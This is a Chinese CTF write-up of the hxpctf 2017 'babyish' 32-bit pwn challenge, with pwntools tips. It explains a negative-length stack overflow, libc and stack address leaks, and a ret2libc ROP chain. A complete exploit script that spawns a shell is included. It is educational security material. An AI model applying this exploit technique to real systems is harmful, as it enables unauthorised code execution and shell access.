hxpctf2017-babyish

pwntools使用技巧以及较新版本32位libc下的ROP

hxpctf 2017 pwn100 babyish

题目比较简单,但是学到了几个知识点,记录一下。

简要分析

main.png
  • checksec

      vccxx1337@vccxx1337-PC:~/Desktop/ctfgame/hxpctf/babyish$ checksec vuln
      [*] '/home/vccxx1337/Desktop/ctfgame/hxpctf/babyish/vuln'
              Arch:     i386-32-little
              RELRO:    Partial RELRO
              Stack:    No canary found
              NX:       NX enabled
              PIE:      No PIE (0x8048000)
    

    开了栈不可执行,所以用栈溢出来执行shellcode没戏;
    审查函数代码,发现greet函数中可以泄露栈中信息,动态调试发现栈上有一个libc地址可以泄露,因此考虑ROP

  • atoi

    之前一直没做出来就是卡在不知道怎么溢出。。多谢USTC的dalao指导

    main函数中调用的num()函数读入我们的输入input,返回atoi(input)的值给main函数的局部变量len,之后将len和63比较,限制len小于63。

    如果输入一个正数是无法溢出的,因为len作为后面read的参数限制了你的输入长度。但是如果我们输入一个负数比如-1,则可以通过这一限制,而-1在内存中存的是补码0xFFFFFFFF,这个数作为read的参数,就允许我们覆盖任意长的堆栈数据。

  • libc 的堆栈调整机制

adjustStack.png

观察main函数发现这个main函数的返回和之前见过的的main函数返回不太一样:

以前见过的返回普遍是直接esp-0x??然后就ret了
这个程序的main函数返回使用栈上存储的数据来调整ret之前的esp的值,也就是说,如果直接ROP,我们的junk数据中必须在ebp-0x0c这个地方布置一个栈地址,这个栈地址必须在我们可覆盖的范围内(也就是大于main函数中buf的地址)。

这样的调整机制在较新的libc中都有(这题的libc版本是2.24),这种机制的好处在于要求攻击者在rop时还泄露一个栈地址,提高了攻击难度。

很巧的是之前泄露libc地址的时候栈中就有一个符合上述条件的栈地址,因此通过在栈上布置好需要的数据,就可以开心的ROP啦。

显示libc信息的技巧

只需要

sudo chmod +x libc.so.6
./libc.so.6

即可。

libc_info.png

pwntools技巧

看了dalao的pwn脚本学到了pwntools的使用姿势:

  • env参数

      io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'}) 
    

    通过在process后面加参数env来指定程序使用的libc,这样就可以让程序运行在远程靶机上大致一样的环境下。对给了libc的题来说,再也不用先用自己的libc调试,成功后再转换为远程libc的地址了。

  • 直接从libc中加载符号偏移

      libc = ELF("./libc.so.6")
      setbuffer_symbol = libc.symbols["setbuffer"]
      system_symbol = libc.symbols["system"]
    
  • gdb调试脚本

    调payload的时候以前总是要一步步运行脚本到发送payload前的语句,现在只需要在发送payload前加上这一句:

      gdb.attach(io)
    

    将会等待gdb的attach,加上pid的显示会更方便些

      pid = proc.pidof(io)
      print pid
      gdb.attach(io)  
    
  • 设置输出调试信息

      context.log_level='debug'
    

    加上这句之后,pwntools的返回信息更加直观详细:

debugInfo.png

攻击脚本

from pwn import *
import time

#设置pwntools
io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF("./libc.so.6")
context.log_level='debug'
#io =remote('35.198.98.140',45067)

#获取所给libc的符号偏移
setbuffer_symbol = libc.symbols["setbuffer"]
system_symbol = libc.symbols["system"]

#泄露内存中栈地址和libc地址
io.recv()
io.send("1"*16)
io.recvuntil("1"*16)
data = io.recv()[:12]
setbuff_addr = int(data[-4:][::-1].encode("hex"),16) - 0xB
stack_addr = int(data[0:4][::-1].encode("hex"),16)
system_addr =  system_symbol - setbuffer_symbol + setbuff_addr
binsh_symbol = 0x0015CD48
binsh_addr = binsh_symbol - system_symbol + system_addr
print "[+] leaked setbuff addr :" + hex(setbuff_addr)
print "[+] calced system_addr :" +hex(system_addr)
print "[+] leaked stack addr:" + hex(stack_addr)
print "[+] calced binsh addr:" + hex(binsh_addr)

#发送ROP链
sleep(3)
io.sendline("-1")
payload = "j"*0x50 + p32(stack_addr) + 3*"junk"+p32(system_addr) + p32(0x080486EF) + p32(binsh_addr)
pid = proc.pidof(io)[0]
print pid
gdb.attach(io)
io.send(payload)
io.interactive()

注意时延问题。。。直接连远程的是后我是用ipython一行一行运行脚本才拿到的shell,修改sleep的秒数有时候好使。

flag.png
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,776评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,527评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,361评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,430评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,511评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,544评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,561评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,315评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,763评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,070评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,235评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,911评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,554评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,173评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,424评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,106评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,103评论 2 352

推荐阅读更多精彩内容